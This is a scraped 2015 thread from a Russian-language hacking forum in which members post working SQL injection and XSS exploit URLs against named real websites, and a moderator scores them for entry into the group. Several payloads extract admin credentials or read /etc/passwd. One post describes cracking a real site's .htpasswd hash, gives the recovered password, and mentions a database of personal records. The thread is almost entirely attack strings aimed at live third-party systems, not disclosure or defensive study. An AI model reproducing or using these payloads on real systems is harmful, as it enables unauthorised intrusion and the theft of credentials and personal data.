HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #51  
Старый 15.07.2015, 02:17
Печа
Guest
Сообщений: n/a
Провел на форуме:
14926

Репутация: 17
По умолчанию

Сайт: http://www.thebandroom.biz/

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.thebandroom.biz/01_search_auto2.php/items.php?id=-1' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@version,19,20,21 and '0'='0
Сайт:http://www.sacaindia.org/

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.sacaindia.org/news.php?ID=-1' union all select 1,2,3,current_user,5,6,7,@@version,9,10,11 and '0'='0
Сайт:http://www.offball.com/

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.offball.com/news.php?id=-1 union all select @@version,current_user,3,4,5
Сайт:http://www.coolncute.com/

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.coolncute.com/data/page.php?id=-1 union all select 1,2,3,@@version,current_user,6,7,8,9,10,11,12,13,14&sort=1
Сайт:http://www.damandiri.or.id/

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.damandiri.or.id/detail.php?id=-1' union all select 1,2,3,4,5,@@version,7,8,9,10,current_user,12,13 and '0'='0
Сайт:http://www.begeerte.be/

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.begeerte.be/page.php?page=productie&ID=-1' union all select 1,2,3,current_user,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 and '0'='0
Сайт:http://www.hospitallocaldepiedecuesta.org/

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.hospitallocaldepiedecuesta.org/page.php?id=-1' union all select 1,2,@@version,4,current_user,6,7,8 and '0'='0
Сайт:http://www.etssp.com/

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.etssp.com/article.php?id=-1 union all select 1,current_user,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
Сайт:http://www.worldbarefootcouncil.com/

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.worldbarefootcouncil.com/news.php?id=-1' union all select 1,current_user,3,4,@@version,6,7,8,9,10,11 and '0'='0
Сайт:http://www.kulmbacher-tierheim.de/

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.kulmbacher-tierheim.de/Detail.php?ID=-1 union all select 1,2,3,current_user,@@version,6,7,8,9
 
Ответить с цитированием

  #52  
Старый 16.07.2015, 05:51
O1d
Guest
Сообщений: n/a
Провел на форуме:
650

Репутация: 0
По умолчанию

Код:
Code:
http://www.ukeas.ph/ukeasnews-event-detail.php?id=32799999 union select 1,2,3,4,concat_ws(0x3a,user_id,user_name,passwd,email),5,6,7,8,9,10,11,12+from+db_users+limit+2,1--

http://www.rokebyschool.co.uk/news/news.php?id=32799999+UNION%20SELECT%201,2,concat_ws(0x3a,id,email,password,admin_user_level_id,active),4,5,6,7,8,9,10,11,12+from+admin_users+limit+0,1
И вот не докрутил тут, глянь, интересно что там http://integra.eu/press.cfm?id=327
 
Ответить с цитированием

  #53  
Старый 19.07.2015, 15:01
Abrigen
Guest
Сообщений: n/a
Провел на форуме:
521

Репутация: 0
По умолчанию

Сайт: www.marcied.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.marcied.com/photo.php?id=346+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+
 
Ответить с цитированием

  #54  
Старый 20.07.2015, 13:57
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от joelblack  
joelblack said:

target:police.gov.bd

type:SQL Injection

version:5.1.69

Код:
Code:
http://www.police.gov.bd/history.php?id=51'+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+--+

добавил

Цитата:
Сообщение от ocheretko  
ocheretko said:

XSS уязвимость
Код:
Code:
http://www.001kanpou.com/search.asp?searchkey=%3C/div%3E%3C/div%3E%3C/form%3E%3Cbody%20background=%22/img/logo.gif%22%20width=%22100%%22%20height=%22100%%22%3E%3Cscript%3Ealert%28
/XSS/%29%3C/script%3E
Цитата:
Сообщение от ocheretko  
ocheretko said:

Сайт:
http://celtsat.com.br
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://celtsat.com.br/produto_cat.php?id=13+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт:
www.albit.com.au
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.albit.com.au/product_cat.php?id=28+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: nijifan.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://nijifan.com/index.php?Language=1&cat_id=222&scat_id=301+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт:
www.apva.org
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.apva.org/rediscovery/page.php?page_id=6+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт:
www.th.boots.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.th.boots.com/eng/brands_cat.php?brand_id=43+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт:
www.shanson.biz
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.shanson.biz/text/index.php?song=1097+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт:
www.io-arch.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.io-arch.com/project.php?project_cat_id=1&project_id=28+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт:
www.tokaiguitar.de
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.tokaiguitar.de/produktdetail.php?id=15+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: islamic-wallpapers.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://islamic-wallpapers.com/sub_cat.php?id=4+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт:
www.florentina.ro
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.florentina.ro/index.php?cat_id=11+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт:
www.pronv.us
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.pronv.us/catalog.php?id_cat=19&sm=3+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт: ravco.jp
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.ravco.jp/cat/view.php?cat_id=6138+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
Сайт:
www.themasterswoodshop.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.themasterswoodshop.com/collection_cat.php?ID=2+and+1=0+%20Union+Select+0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878+,0x787878756E696F6E787878--
это добавил.

Цитата:
Сообщение от ocheretko  
ocheretko said:

Сайт:
www.themasterswoodshop.com
Уязвимость:
Local File Reading
Эксплоит:
Код:
Code:
http://www.themasterswoodshop.com/collection_cat.php?ID=2+and+1=0+%20Union%20Select%20%201,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,3,4--
Сайт:
www.io-arch.com
Уязвимость:
Local File Reading
Эксплоит:
Код:
Code:
http://www.io-arch.com/project.php?project_cat_id=1&project_id=28+and+1=0+%20Union%20Select%20%201,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,3,4,5,6,7,8,9--
Сайт:
www.ravco.jp
Уязвимость:
Local File Reading
Эксплоит:
Код:
Code:
http://www.ravco.jp/cat/view.php?cat_id=6138+and+1=0+%20Union%20Select%20%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)%20))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20,%20UNHEX(HEX(CONCAT(0x5B6B65795D,load_file(0x2F6574632F706173737764),0x5B6B65795D)))%20--
это, скорее, sqli с правами на чтение, поэтому защитано как sqli. Добавил +28 очков

Цитата:
Сообщение от O1d  
O1d said:

Код:
Code:
http://www.ukeas.ph/ukeasnews-event-detail.php?id=32799999 union select 1,2,3,4,concat_ws(0x3a,user_id,user_name,passwd,email),5,6,7,8,9,10,11,12+from+db_users+limit+2,1--

http://www.rokebyschool.co.uk/news/news.php?id=32799999+UNION%20SELECT%201,2,concat_ws(0x3a,id,email,password,admin_user_level_id,active),4,5,6,7,8,9,10,11,12+from+admin_users+limit+0,1
И вот не докрутил тут, глянь, интересно что там
http://integra.eu/press.cfm?id=327
добавил

Цитата:
Сообщение от Abrigen  
Abrigen said:

Сайт:
www.marcied.com
Уязвимость:
SQL Injection
Эксплоит:
Код:
Code:
http://www.marcied.com/photo.php?id=346+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+
sqli гуглится, не добавлена.
 
Ответить с цитированием

  #55  
Старый 20.07.2015, 13:58
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от Печа  
Печа said:

Сайт:
http://www.thebandroom.biz/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.thebandroom.biz/01_search_auto2.php/items.php?id=-1' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,@@version,19,20,21 and '0'='0
Сайт:
http://www.sacaindia.org/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.sacaindia.org/news.php?ID=-1' union all select 1,2,3,current_user,5,6,7,@@version,9,10,11 and '0'='0
Сайт:
http://www.offball.com/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.offball.com/news.php?id=-1 union all select @@version,current_user,3,4,5
Сайт:
http://www.coolncute.com/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.coolncute.com/data/page.php?id=-1 union all select 1,2,3,@@version,current_user,6,7,8,9,10,11,12,13,14&sort=1
Сайт:
http://www.damandiri.or.id/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.damandiri.or.id/detail.php?id=-1' union all select 1,2,3,4,5,@@version,7,8,9,10,current_user,12,13 and '0'='0
Сайт:
http://www.begeerte.be/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.begeerte.be/page.php?page=productie&ID=-1' union all select 1,2,3,current_user,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 and '0'='0
Сайт:
http://www.hospitallocaldepiedecuesta.org/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.hospitallocaldepiedecuesta.org/page.php?id=-1' union all select 1,2,@@version,4,current_user,6,7,8 and '0'='0
Сайт:
http://www.etssp.com/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.etssp.com/article.php?id=-1 union all select 1,current_user,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
Сайт:
http://www.worldbarefootcouncil.com/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.worldbarefootcouncil.com/news.php?id=-1' union all select 1,current_user,3,4,@@version,6,7,8,9,10,11 and '0'='0
Сайт:
http://www.kulmbacher-tierheim.de/
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.kulmbacher-tierheim.de/Detail.php?ID=-1 union all select 1,2,3,current_user,@@version,6,7,8,9
тоже все добавил, вы проходите

у нас уже трое человек попавших через конкурс, @Печа, @3nvY, @ocheretko
 
Ответить с цитированием

  #56  
Старый 22.07.2015, 15:50
ocheretko
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29

Репутация: 0
По умолчанию

Сайт Украинского телеканала

Код:
Code:
http://www.hromadske.tv/search?s=%27;alert%28%27antichat%27%29;//
Уязвимость интересна новичкам тем, что работает в Chrome - инжект в Javascript var stext1 = '';alert('antichat');//';
 
Ответить с цитированием

  #57  
Старый 22.07.2015, 16:38
Abrigen
Guest
Сообщений: n/a
Провел на форуме:
521

Репутация: 0
По умолчанию

Сайт: www.gamagroupusa.com

Уязвимость: Sql inj

Код:
Code:
http://www.gamagroupusa.com/index.php?i=1+union+select+1,2,3,version()+--+
 
Ответить с цитированием

  #58  
Старый 23.07.2015, 10:50
semen6192
Guest
Сообщений: n/a
Провел на форуме:
6419

Репутация: 2
По умолчанию

Сайт: http://www.karmatube.org

Уязвимость: XSS

Эксплоит:

Код:
Code:
http://www.karmatube.org/videos.php?op=filter&cat=%253Cscript%253Ealert%28%25271%2527%29%253C/script%253E
 
Ответить с цитированием

  #59  
Старый 23.07.2015, 14:15
O1d
Guest
Сообщений: n/a
Провел на форуме:
650

Репутация: 0
По умолчанию

http://www.sicb.org/

FILE_PRIV=Y

106 columns

/etc/passwd:

Код:
Code:
http://www.sicb.org/meetings/2015/schedule/abstractdetails.php?id=199999997 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,load_file(0x2f6574632f706173737764),48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106+from+mysql.user
Методом ручного фазинга узнаем расположение логов.

Читаем логи /var/log/httpd/error_log и видим расположение файлов веб-сервера в /var/www/html

Читаем .htaccess админки из /var/www/html/admin/.htaccess:

Цитата:
Сообщение от None  
AuthUserFile /home/sicb/includes/.htpasswd
AuthName "SICB Admin realm"
AuthType Basic
require valid-user
Читаем файл с паролем и брутим:

Цитата:
Сообщение от None  
ruedi:UMn02wTYUxVGc -> ottilie
Но фейл в админку не пускает, видимо фильтр по IP т.к. бейсик авторизацию уже мы проходим.

PS БД очень большая в ней 9 БД и инфа начиная с 2002 года о студентах, докторах, профессорах. Дампить не стал.
 
Ответить с цитированием

  #60  
Старый 23.07.2015, 14:28
user6334
Guest
Сообщений: n/a
Провел на форуме:
91312

Репутация: 12
По умолчанию

Site: http://www.safetylit.org

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.safetylit.org/week/journalpage.php?jid=-1+UNION+SELECT+1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ